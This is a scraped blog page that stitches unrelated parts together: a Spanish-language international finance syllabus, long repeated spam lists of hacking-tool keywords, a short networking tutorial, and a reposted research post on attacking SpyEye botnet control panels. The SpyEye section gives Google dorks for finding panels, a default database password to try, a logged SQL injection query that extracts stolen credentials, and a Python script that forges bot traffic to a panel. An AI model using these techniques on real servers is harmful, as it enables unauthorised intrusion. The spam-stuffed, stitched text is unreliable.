UNIVERSIDAD NACIONAL EXPERIMENTAL
"SIMÓN RODRÍGUEZ"
NÚCLEO PALO VERDE

CONTENIDO PROGRAMÁTICO

TEMA 1: GENERALIDADES.

1. DEFINICIÓN DE FINANZAS.
2. CONCEPTO DE FINANZAS INTERNACIONALES.
3. IMPORTANCIA DE LAS FINANZAS INTERNACIONALES.
4. NOMENCLATURA USADAS EN LAS FINANZAS INTERNACIONALES.
5. VALOR DE CAMBIO CON RESPECTO AL DÓLAR Y AL EURO.
6. TIPOS DE OPERACIONES INTERNACIONALES.
7. VENTAJAS Y DESVENTAJAS.

TEMA 2: BALANZA DE PAGOS.

1. CONCEPTO, CARACTERÍSTICAS, TIPOS DE CUENTAS.
2. REGISTRO DE LAS OPERACIONES CONTABLES.
3. PROBLEMAS EN EL REGISTRO DE LAS OPERACIONES EN LA BALANZA DE PAGOS.
4. ANÁLISIS DE LOS EFECTOS DE LA BALANZA DE PAGOS.
5. DESCRIPCIÓN DE LA BALANZA DE PAGOS EN VENEZUELA DESDE EL AÑO 2005 HASTA EL PRESENTE.

TEMA 3: SISTEMA MONETARIO INTERNACIONAL.

1. CONCEPTO DEL SISTEMA MONETARIO INTERNACIONAL.
2. SISTEMA PATRÓN ORO: DEFINICIÓN Y FUNCIONAMIENTO.
3. SISTEMA BRETÓN WOODS: CONCEPTO Y CARACTERÍSTICAS, COMPORTAMIENTO DESDE 1944 HASTA EL PRESENTE.
4. INSTITUCIONES FINANCIERAS INTERNACIONALES: FONDO MONETARIO INTERNACIONAL: SU CREACIÓN, FUNCIONES, TIPOS DE SERVICIO QUE PRESTA, ROL DE ESTOS ORGANISMOS A NIVEL GLOBAL EN LOS ÚLTIMOS AÑOS.
5. BANCO MUNDIAL: CREACIÓN, FUNCIONES, TIPOS DE SERVICIO QUE PRESTA Y ROL DE ESTE ORGANISMO MUNDIAL EN LOS ÚLTIMOS TIEMPOS HASTA EL PRESENTE.
6. BANCO INTERNACIONAL DE PAGO (COMPENSACIÓN): ACUERDO DE BASILEA: SU CREACIÓN, FUNCIONES Y TIPOS DE SERVICIO QUE PRESTA.
7. SISTEMA MONETARIO EUROPEO: CREACIÓN, ESTRUCTURA, FUNCIONES Y TIPOS DE SERVICIO QUE PRESTA.
8. LA MONEDA EURO: COTIZACIÓN, ESTRUCTURA (CANASTA DE VARIAS MONEDAS).
9. DERECHO ESPECIAL DE GIRO: CONCEPTO, FUNCIONES Y ESTRUCTURA.

TEMA 4: MERCADO CAMBIARIO.

1. CONCEPTO DE DIVISA.
2. MERCADO DE DIVISAS.
3. OPERACIONES DE CAMBIO EN EL MERCADO INTERNACIONAL.
4. TIPOS DE COTIZACIONES DE CAMBIO.
5. CONTRATOS A FUTURO (FORWARD): CONCEPTO, FUNCIONES Y TIPOS DE CONTRATOS.
6. SISTEMA CAMBIARIO DE BANDAS: DEFINICIÓN Y FUNCIONAMIENTO.
7. RIESGO CAMBIARIO: CONCEPTO, ELEMENTOS FUNDAMENTALES DEL RIESGO CAMBIARIO: POSICIÓN CORTA Y POSICIÓN LARGA, TIPOS DE RIESGOS DE CAMBIO: TRANSACCIÓN DE BALANCE Y ECONÓMICO, ENDEUDAMIENTO EMPRESARIAL EN MONEDA EXTRANJERA.
8. COMPORTAMIENTO DEL MERCADO CAMBIARIO EN VENEZUELA DESDE 2005 HASTA EL PRESENTE.

TEMA 5: MERCADO FINANCIERO INTERNACIONAL.

1. CONCEPTO Y FINALIDAD.
2. ESTRUCTURA DEL MERCADO FINANCIERO INTERNACIONAL.
3. TIPOS Y FUNCIONAMIENTO DE LOS CRÉDITOS INTERNACIONALES. (TRAER MODELO).
4. MERCADO DE EURODÓLARES: TIPOS Y FUNCIONAMIENTO (TRAER MODELO).
5. MERCADO INTERNACIONAL DE BONOS: CLASIFICACIÓN DEL MERCADO DE BONOS, ESTRUCTURA Y FUNCIONAMIENTO.
6. MERCADO DE EUROCRÉDITOS: ESTRUCTURA Y FUNCIONAMIENTO.

TEMA 6: FINANCIAMIENTO DEL COMERCIO INTERNACIONAL.

1. CONCEPTO Y FINALIDAD.
2. CARTA DE CRÉDITO: DEFINICIÓN, TIPOS, MODALIDADES, VENTAJAS Y DESVENTAJAS (TRAER MODELO).
3. COBRO DOCUMENTARIO: CONCEPTO Y TIPOS (TRAER MODELO).
4. ACEPTACIÓN BANCARIA: CONCEPTO Y TIPOS. (TRAER MODELO).
5. FACTORIZACIÓN: DEFINICIÓN Y TIPOS (TRAER MODELO).
6. FORFETIZACIÓN: CONCEPTO Y TIPOS (TRAER MODELO).
7. ARRENDAMIENTO INTERNACIONAL: CONCEPTO Y TIPOS (TRAER MODELO).
8. PERMUTA INTERNACIONAL: CONCEPTO Y TIPOS (TRAER MODELO).

TEMA 7: MERCADO BURSÁTIL INTERNACIONAL.

1. MERCADO WALL STREET (NEW YORK): FUNCIONAMIENTO Y TIPOS DE OPERACIONES.
2. MERCADO DEL ORO: FUNCIONAMIENTO Y TIPOS DE OPERACIONES.
3. DEUDA EXTERNA MUNDIAL: MERCADO DE LA DEUDA EXTERNA LATINOAMERICANA, TIPOS DE TÍTULOS QUE SE COTIZAN Y OPERACIONES; PLAN BRADY: CONCEPTO, VENTAJA Y DESVENTAJAS.
4. DEUDA EXTERNA VENEZOLANA: COMPORTAMIENTO DESDE 1983 HASTA NUESTROS DÍAS.
5. CLUB DE PARÍS: FUNCIONAMIENTO, VENTAJAS Y DESVENTAJAS.
6. MERCADO DE TÍTULOS ADR Y GDR: CONCEPTO Y FUNCIONAMIENTO DE ESTOS TÍTULOS.

TEMA 8: INVERSIÓN EXTERNA DIRECTA.

1. CONCEPTO.
2. EFECTOS DE LA INVERSIÓN EXTERNA DIRECTA EN LA BALANZA DE PAGOS EN EL PAÍS RECEPTOR Y DEL PAÍS INVERSOR.
3. LA EMPRESA MULTINACIONAL: DEFINICIÓN, CARACTERÍSTICAS, VENTAJA Y DESVENTAJAS DE SU INSTALACIÓN EN EL PAÍS.
4. FINANCIAMIENTO DE CASA MATRIZ A FILIAL Y VICEVERSA.
5. ASOCIACIONES ESTRATÉGICAS: CONCEPTO Y FUNCIONAMIENTO EN VENEZUELA (TRAER 02 MODELOS DE CASOS EN NUESTRO PAÍS).
6. COMPORTAMIENTO DE LA INVERSIÓN EXTRANJERA DIRECTA EN VENEZUELA DESDE 2005 HASTA NUESTROS DÍAS.

martes, 23 de enero de 2024

Hackerhubb.blogspot.com

Hackerhubb.blogspot.com

More info


  1. Hack Tool Apk
  2. Hack Tools Mac
  3. Hacking Tools
  4. Pentest Tools List
  5. Hack Tools For Ubuntu
  6. Wifi Hacker Tools For Windows
  7. Hacker Tools For Windows
  8. Hacking Tools For Windows 7
  9. Hacking Tools Online
  10. Hacker Tools For Mac
  11. Hack Tools 2019
  12. Hacking Tools Usb
  13. Physical Pentest Tools
  14. Nsa Hack Tools
  15. Hacking Tools
  16. Hacking Tools Software
  17. Pentest Tools Online
  18. Hacker Tools Free
  19. Pentest Tools For Mac
  20. Hack Tools For Mac
  21. Hacks And Tools
  22. Pentest Tools Port Scanner
  23. Pentest Tools For Ubuntu
  24. Underground Hacker Sites
  25. Hacking Tools
  26. Pentest Automation Tools
  27. Hacking Tools Free Download
  28. Pentest Tools
  29. Pentest Tools Alternative
  30. Hack Tools For Windows
  31. What Is Hacking Tools
  32. Hacking Apps
  33. Pentest Tools Windows
  34. Pentest Tools Bluekeep
  35. Hacker Tools
  36. Hacking Tools Mac
  37. Easy Hack Tools
  38. Hack Tools Online
  39. Easy Hack Tools
  40. Hacker Tools
  41. Black Hat Hacker Tools
  42. How To Hack
  43. Hacker Tools 2020
  44. Termux Hacking Tools 2019
  45. Pentest Tools Android
  46. Best Hacking Tools 2019
  47. How To Hack
  48. Hacker Tools Apk
  49. Hacker Tools Apk Download
  50. Hack Tools 2019
  51. Hacker Tools For Pc
  52. Top Pentest Tools
  53. Hacking Apps
  54. How To Install Pentest Tools In Ubuntu
  55. Hacker Tool Kit
  56. Hacking Tools For Windows 7
  57. Pentest Reporting Tools
  58. Hacking Tools Name
  59. Pentest Tools Url Fuzzer
  60. Hacker
  61. Pentest Tools Website Vulnerability
  62. Hacking Tools For Beginners
  63. Hacking Tools For Games
  64. Termux Hacking Tools 2019
  65. Easy Hack Tools
  66. Pentest Tools Website
  67. Hack Tools Mac
  68. Hacker Tools Free Download
  69. Computer Hacker
  70. Pentest Tools Subdomain
  71. Hacking Tools Kit
  72. Pentest Tools Port Scanner
  73. Hacker Tools
  74. Hacker Tools Apk
  75. New Hack Tools
  76. Pentest Tools For Ubuntu
  77. Hack Tool Apk No Root
  78. Pentest Tools List
  79. Pentest Tools Alternative
  80. Best Hacking Tools 2020
  81. Nsa Hack Tools Download
  82. Pentest Tools Apk
  83. Pentest Tools Nmap
  84. Pentest Box Tools Download
  85. Hack Tools
  86. Pentest Tools Kali Linux
  87. Hacker Tools 2019
  88. How To Install Pentest Tools In Ubuntu
  89. Nsa Hack Tools
  90. Hacking Tools Windows
  91. Tools 4 Hack
  92. Pentest Tools
  93. Hacking Tools For Games
  94. Nsa Hack Tools
  95. Hack Tools
  96. Top Pentest Tools
  97. Best Pentesting Tools 2018
  98. Hacker Tools 2020
  99. Hack Tools Mac
  100. Beginner Hacker Tools
  101. Tools Used For Hacking
  102. Free Pentest Tools For Windows
  103. Hacker Tools For Mac
  104. Hacking Tools For Pc
  105. Hacking Tools For Pc
  106. Hack Tool Apk No Root
  107. Tools 4 Hack
  108. Hacking Tools For Beginners
  109. Pentest Reporting Tools
  110. Pentest Tools Url Fuzzer
  111. Easy Hack Tools
  112. Pentest Tools For Windows
  113. Pentest Tools For Ubuntu
  114. What Are Hacking Tools
  115. Hack Tools Github
  116. Hacker Tools Windows
  117. Hacker Tools For Pc
  118. Nsa Hack Tools Download
  119. Pentest Tools For Ubuntu
  120. Hacking Tools Download
  121. Pentest Tools Open Source
  122. Hacking Tools Github
  123. New Hack Tools
  124. Hacking Tools For Pc

lunes, 22 de enero de 2024

Networking | Switching And Routing | Tutorial 1 | 2018


Welcome to my new series of tutorials about networking. Moreover in this series I'll discuss briefly each and every thing related to routing and switching. After that you will able to pass an exam of HCNA, CCNA etc. First of all you have to know which software is used by which company such as Huawei used its own software named eNSP while Cisco used its own software named Cisco Packet Tracer. After that you have to know that how to download and install both of the software in your computer systems. So the purpose of this blog is to give you people an overview about how to download and install both of them.

What is a Network? 

First of all we must have to know about what is a network. So the network is the interconnection of two or more than two devices in such a way that they can communicate each other. In computer networks we can say that the interconnection of two or more than two end devices (computer, laptops, printers etc) for the sake of sending and receiving some amount of data is known as computer network.

What is Internet?  

The very simple and easily understandable definition of a internet is "The network of networks". Now what is meant by that? When different networks from the different areas or at the same areas wanna communicate with each other then internet formed. So we can say that "Internet is the interconnection of different networks in such a way that networks can communicate with each other".


Related word
  1. Hacking App
  2. Hacking Tools For Windows
  3. Hacker Tool Kit
  4. Hacking Tools For Windows Free Download
  5. Hacking App
  6. Best Hacking Tools 2020
  7. Hack Tools Mac
  8. Pentest Tools For Android
  9. Pentest Tools Website
  10. What Is Hacking Tools
  11. Pentest Automation Tools
  12. Pentest Tools Port Scanner
  13. Hacker Tools List
  14. Hacking Tools Software
  15. Pentest Tools Linux
  16. Physical Pentest Tools
  17. Pentest Automation Tools
  18. Pentest Tools Bluekeep
  19. Best Pentesting Tools 2018
  20. Hacker Tools For Ios
  21. Pentest Tools Open Source
  22. Hacker Tools For Pc
  23. What Is Hacking Tools
  24. Hacker Tools Apk Download
  25. Hacker Tools Free
  26. Pentest Recon Tools
  27. Usb Pentest Tools
  28. Pentest Tools Nmap
  29. Pentest Tools Online
  30. Hacking Tools For Kali Linux
  31. Pentest Tools Kali Linux
  32. Hacking Tools Name
  33. Best Hacking Tools 2019
  34. Pentest Tools Nmap
  35. Hack Tools Online
  36. Pentest Tools Free
  37. Hacking Tools Online
  38. Hacking Tools Online
  39. Hacker Tools Software
  40. Pentest Tools Find Subdomains
  41. Hack Tool Apk
  42. Hack Website Online Tool
  43. Hacking Tools Download
  44. Hacker Tool Kit
  45. Hacker Security Tools
  46. Nsa Hack Tools Download
  47. Hacking Tools Mac
  48. Hacker Tools Apk
  49. Hacking App
  50. Hacker Tools For Pc
  51. Hacking Tools Download
  52. Underground Hacker Sites
  53. Hacker Tools Software
  54. Pentest Tools For Android
  55. Hacker Tools List
  56. Pentest Tools
  57. New Hacker Tools
  58. Hack Tools
  59. Pentest Tools Download
  60. What Is Hacking Tools
  61. Pentest Automation Tools
  62. Hacking Tools Kit
  63. Hacker Tools For Mac
  64. Hack Tools For Pc
  65. Hack Tools
  66. Hacker Tools For Ios
  67. Top Pentest Tools
  68. Pentest Tools Tcp Port Scanner
  69. Blackhat Hacker Tools
  70. Growth Hacker Tools
  71. Pentest Tools Find Subdomains
  72. Tools For Hacker
  73. Hack Tools Online
  74. Hacker Techniques Tools And Incident Handling
  75. Hacker Tools
  76. Hack Tool Apk No Root
  77. Hacking Tools Download
  78. Hack Tools Download
  79. Hacker Tool Kit
  80. Hacker Tools Linux
  81. Pentest Tools Website
  82. Hacker Hardware Tools
  83. How To Make Hacking Tools
  84. Hack Tool Apk No Root
  85. Hacker Tools Free Download
  86. Free Pentest Tools For Windows
  87. Hacking Tools And Software
  88. Hacker Tools Apk
  89. Easy Hack Tools
  90. Hack Tools For Games
  91. Hacking Tools For Pc
  92. Pentest Tools For Windows
  93. Best Hacking Tools 2019
  94. Best Hacking Tools 2020
  95. Growth Hacker Tools
  96. Pentest Tools Url Fuzzer
  97. Tools For Hacker
  98. Hacking Tools For Mac
  99. Hacking Tools 2019
  100. Hack Apps
  101. Nsa Hack Tools
  102. Pentest Tools Download
  103. Hacking Tools For Pc
  104. Hack Rom Tools
  105. What Are Hacking Tools
  106. Pentest Tools Port Scanner
  107. Hack Tools Pc
  108. Hackers Toolbox
  109. Tools For Hacker
  110. Hack Tools For Pc
  111. Pentest Tools Open Source
  112. Hacking Tools 2020
  113. Hack Apps
  114. Pentest Tools For Windows
  115. Blackhat Hacker Tools
  116. Pentest Tools Linux
  117. Pentest Tools Linux
  118. Hacking Tools And Software
  119. Hacking Tools Online
  120. Hack Tools For Mac
  121. Usb Pentest Tools
  122. Hack Tools For Games
  123. Hacking Tools Online
  124. Hacker Tools
  125. Hack Tools For Ubuntu
  126. Hacking Tools For Windows Free Download
  127. Hackrf Tools
  128. Hacking Tools For Mac
  129. Hacker Tools Software
  130. Hak5 Tools
  131. Pentest Tools Find Subdomains
  132. Nsa Hack Tools
  133. Android Hack Tools Github
  134. Hacking Tools Software
  135. Hacking Tools For Games
  136. Pentest Tools List
  137. Hack Tools Online
  138. Termux Hacking Tools 2019
  139. Pentest Automation Tools
  140. Nsa Hacker Tools
  141. Tools For Hacker
  142. Usb Pentest Tools
  143. Hacking Tools For Pc
  144. Best Hacking Tools 2019
  145. Blackhat Hacker Tools
  146. Hacking Tools For Kali Linux
  147. Hacking Tools For Windows
  148. Ethical Hacker Tools
  149. Pentest Tools Website Vulnerability
  150. New Hack Tools
  151. Hacker Tools Windows
  152. Pentest Tools
  153. Hack Tools Mac
  154. New Hack Tools
  155. Pentest Reporting Tools
  156. Hacker Tools Github
  157. Hack Tool Apk

Attacking Financial Malware Botnet Panels - SpyEye

This is the second blog post in the "Attacking financial malware botnet panels" series. After playing with Zeus, my attention turned to another old (and dead) botnet, SpyEye. From an ITSEC perspective, SpyEye shares a lot of vulnerabilities with Zeus. 

The following report is based on SpyEye 1.3.45, which is old, and if we are lucky, the whole SpyEye branch will be dead soon. 

Google dorks to find SpyEye C&C server panel related stuff:

  • if the img directory gets indexed, it is rather easy, search for e.g. inurl:b-ftpbackconnect.png
  • if the install directory gets indexed, again, easy, search for e.g. inurl:spylogo.png
  • also, if you find a login screen, check the css file (style.css), and you see #frm_viewlogs, #frm_stat, #frm_botsmon_country, #frm_botstat, #frm_gtaskloader and stuff like that, you can be sure you found it
  • otherwise, it is the best not to Google for it, but get a SpyEye sample and analyze it
And this is how the control panel login looks like, nothing sophisticated:


The best part is that you don't have to guess the admin's username ;)

This is how an average control panel looks like:


Hack the Planet! :)

Boring vulns found (warning, an almost exact copy from the Zeus blog post)


  • Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
  • No password policy - admins can set up really weak passwords
  • No anti brute-force - you can try to guess the admin's password. There is no default username, as there is no username handling!
  • Password autocomplete enabled - boring
  • Missing HttpOnly flag on session cookie - interesting when combining with XSS
  • No CSRF protection - e.g. you can upload new exe, bin files, turn plugins on/off :-( boring. Also the file extension check can be bypassed, but the files are stored in the database, so no PHP shell this time. If you check the following code, you can see that even the file extension and type is checked, and an error is shown, but the upload process continues. And even if the error would stop the upload process, the check can be fooled by setting an invalid $uptype. Well done ...
        if ($_FILES['file']['tmp_name'] && ($_FILES['file']['size'] > 0))         {                 $outstr = "<br>";                 set_time_limit(0);                 $filename = str_replace(" ","_",$_FILES['file']['name']);                 $ext = substr($filename, strrpos($filename, '.')+1);                 if( $ext==='bin' && $uptype!=='config' ) $outstr .= "<font class='error'>Bad CONFIG extension!</font><br>";                 if( $ext==='exe' && $uptype!=='body' && $uptype!=='exe' ) $outstr .= "<font class='error'>Bad extension!</font><br>";                  switch( $uptype )                 {                 case 'body': $ext = 'b'; break;                 case 'config': $ext = 'c'; break;                 case 'exe': $ext = 'e'; break;                 default: $ext = 'e';                 }                 $_SESSION['file_ext'] = $ext;                 if( isset($_POST['bots']) && trim($_POST['bots']) !== '')                 {                         $bots = explode(' ', trim($_POST['bots']));                         //writelog("debug.log", trim($_POST['bots']));                         $filename .= "_".(LastFileId()+1);                 }                 if( FileExist($filename) ) $filename .= LastFileId();                 $tmpName  = $_FILES['file']['tmp_name'];                 $fileSize = $_FILES['file']['size'];                 $fileType = $_FILES['file']['type'];                 ## reading all file for calculating hash                 $fp = fopen($tmpName, 'r'); 
  • Clear text password storage - the MySQL passwords are stored in php files, in clear text. Also, the login password to the form panel is stored in clear text.
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5. Just look at the pure simplicity of the login check, great work!
$query = "SELECT * FROM users_t WHERE uPswd='".md5($pswd)."'";
  • ClickJacking - really boring stuff

SQL injection


SpyEye has a fancy history of SQL injections. See details here, here, here, video here and video here.

It is important to highlight the fact that most of the vulnerable functions are reachable without any authentication, because these PHP files lack user authentication at the beginning of the files.

But if a C&C server owner gets pwned through this vuln, it is not a good idea to complain to the developer, because after careful reading of the install guide, one can see:

"For searching info in the collector database there is a PHP interface as formgrabber admin panel. The admin panel is not intended to be found on the server. This is a client application."

And there are plenty of reasons not to install the formgrabber admin panel on any internet reachable server. But this fact leads to another possible vulnerability. The user for this control panel is allowed to remotely login to the MySQL database, and the install guide has pretty good passwords to be reused. I mean it looks pretty secure, there is no reason not to use that.

CREATE USER 'frmcpviewer' IDENTIFIED BY 'SgFGSADGFJSDGKFy2763272qffffHDSJ'; 

Next time you find a SpyEye panel, and you can connect to the MySQL database, it is worth a shot to try this password.

Unfortunately the default permissions for this user is not enough to write files (select into outfile):

Access denied for user 'frmcpviewer' (using password: YES)

I also made a little experiment with this SQL injection vulnerability. I did set up a live SpyEye botnet panel, created the malware install binaries (droppers), and sent the droppers to the AV companies. And after more and more sandboxes connected to my box, someone started to exploit the SQL injection vulnerability on my server!

63.217.168.90 - - [16/Jun/2014:04:43:00 -0500] "GET /form/frm_boa-grabber_sub.php?bot_guid=&lm=3&dt=%20where%201=2%20union%20select%20@a:=1%20from%20rep1%20where%20@a%20is%20null%20union%20select%20@a:=%20@a%20%2b1%20union%20select%20concat(id,char(1,3,3,7),bot_guid,char(1,3,3,7),process_name,char(1,3,3,7),hooked_func,char(1,3,3,7),url,char(1,3,3,7),func_data)%20from%20rep2_20140610%20where%20@a=3%23 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"

Although the query did not return any meaningful data to the attacker (only data collected from sandboxes), it raises some legal questions.

Which company/organization has the right to attack my server? 
  • police (having a warrant)
  • military (if we are at war)
  • spy agencies (always/never, choose your favorite answer)
  • CERT organisations?

But, does an AV company or security research company has the legal right to attack my server? I don't think so... The most problematic part is when they hack a server (without authorization), and sell the stolen information in the name of "intelligence service". What is it, the wild wild west?

The SQLi clearly targets the content of the stolen login credentials. If this is not an AV company, but an attacker, how did they got the SpyEye dropper? If this is an AV company, why are they stealing the stolen credentials? Will they notify the internet banking owners about the stolen credentials for free? Or will they do this for money?

And don't get me wrong, I don't want to protect the criminals, but this is clearly a grey area in the law. From an ethical point of view, I agree with hacking the criminal's servers. As you can see, the whole post is about disclosing vulns in these botnet panels. But from a legal point of view, this is something tricky ... I'm really interested in the opinion of others, so comments are warmly welcome.

On a side note, I was interested how did the "attackers" found the SpyEye form directory? Easy, they brute-forced it, with a wordlist having ~43.000 entries.

(Useless) Cross site scripting


Although parts of the SpyEye panel are vulnerable to XSS, it is unlikely that you will to find these components on the server, as these codes are part of the install process, and the installer fails to run if a valid install is found. And in this case, you also need the DB password to trigger the vuln...



Session handling


This is a fun part. The logout button invalidates the session only on the server side, but not on the client side. But if you take into consideration that the login process never regenerates the session cookies (a.k.a session fixation), you can see that no matter how many times the admin logs into the application, the session cookie remains the same (until the admin does not close the browser). So if you find a session cookie which was valid in the past, but is not working at the moment, it is possible that this cookie will be valid in the future ...

Binary server


Some parts of the SpyEye server involve running a binary server component on the server, to collect the form data. It would be interesting to fuzz this component (called sec) for vulns.

Log files revealed


If the form panel mentioned in the SQLi part is installed on the server, it is worth visiting the <form_dir>/logs/error.log file, you might see the path of the webroot folder, IP addresses of the admins, etc.

Reading the code


Sometimes reading the code you can find code snippets, which is hard to understand with a clear mind:

$content = fread($fp, filesize($tmpName)); if ( $uptype === 'config' )     $md5 = GetCRC32($content); else $md5 = md5($content); .... <script> if (navigator.userAgent.indexOf("Mozilla/4.0") != -1) {         alert("Your browser is not support yet. Please, use another (FireFox, Opera, Safari)");         document.getElementById("div_main").innerHTML = "<font class=\'error\'>ChAnGE YOuR BRoWsEr! Dont use BUGGED Microsoft products!</font>"; } </script> 

Decrypting SpyEye communication

It turned out that the communication between the malware and C&C server is not very sophisticated (Zeus does a better job at it, because the RC4 key stream is generated from the botnet password).

function DeCode($content) {         $res = '';         for($i = 0; $i < strlen($content); $i++)         {                 $num = ord($content[$i]);                 if( $num != 219) $res .= chr($num^219);         }         return $res; } 
Fixed XOR key, again, well done ...
This means that it is easy to create a script, which can communicate with the SpyEye server. For example this can be used to fill in the SpyEye database with crap data.


import binascii import requests import httplib, urllib  def xor_str(a, b):     i = 0     xorred = ''     for i in range(len(a)):         xorred += chr(ord(a[i])^b)     return xorred              b64_data= "vK6yv+bt9er17O3r6vqPnoiPjZb2i5j6muvo6+rjmJ/9rb6p5urr6O/j/bK+5uP16/Xs7evq9ers7urv/bSo5u316vXs7evq/a6v5pq/trK1/bi4qbjm453j6uPv7Or9tr/u5um+uuvpve3p7eq/4+vsveLi7Lnqvrjr6ujs7rjt7rns/au3vOa5sre3srW8s7q2tr6p4Lm3tLiw4LmuvKm+q7Spr+C4uPu8qbq5ub6p4Li4vKm6ubm+qeC4qb6/sq+8qbq54LiuqK+0tri0tbW+uK+0qeC/v7So4L+1qLqrsuC+trqyt7ypurm5vqngvb24vqmvvKm6ubm+qeC9/aivuq/mtLW3srW+" payload =xor_str (binascii.a2b_base64(b64_data), 219)  print ("the decrypted payload is: " + payload) params = (binascii.b2a_base64(xor_str(payload,219))) payload = {'data': params} r = requests.post("http://spyeye.localhost/spyeye/_cg/gate.php", data=payload) 

Morale of the story?


Criminals produce the same shitty code as the rest of the world, and thanks to this, some of the malware operators get caught and are behind bars now. And the law is behind the reality, as always.

Related articles


Hackerhubb.blogspot.com

Hackerhubb.blogspot.comMore info
  1. Hak5 Tools
  2. Best Hacking Tools 2019
  3. Hacking Tools Mac
  4. Pentest Tools For Ubuntu
  5. Hacking Tools Usb
  6. Tools 4 Hack
  7. Hacking Tools For Pc
  8. Computer Hacker
  9. Hacking Tools 2020
  10. Hacker Tools Apk
  11. Hacker Search Tools
  12. Hacker Tools Github
  13. Hack Apps
  14. How To Hack
  15. Hacking Tools Pc
  16. Hack Tools Github
  17. Hackrf Tools
  18. Pentest Tools For Android
  19. Pentest Tools Bluekeep
  20. Physical Pentest Tools
  21. Hacking Tools Windows 10
  22. Growth Hacker Tools
  23. Hacker Tools List
  24. Nsa Hack Tools Download
  25. Pentest Tools Download
  26. Hacker Tools Software
  27. Pentest Tools Nmap
  28. Install Pentest Tools Ubuntu
  29. Easy Hack Tools
  30. Hacking Tools Windows
  31. Hacking Tools Windows
  32. Pentest Tools Apk
  33. Hacking Tools Name
  34. Pentest Tools Bluekeep
  35. Pentest Recon Tools
  36. Hacking Tools Free Download
  37. Hacking Tools For Kali Linux
  38. Pentest Tools Website
  39. Hacker Tools For Pc
  40. Game Hacking
  41. Pentest Tools Alternative
  42. Hak5 Tools
  43. Hacker Tools Online
  44. Hacking Tools
  45. Github Hacking Tools
  46. Best Hacking Tools 2019
  47. Pentest Tools Subdomain
  48. Best Hacking Tools 2020
  49. How To Hack
  50. Pentest Tools Github
  51. Nsa Hacker Tools
  52. Hacker Tools Linux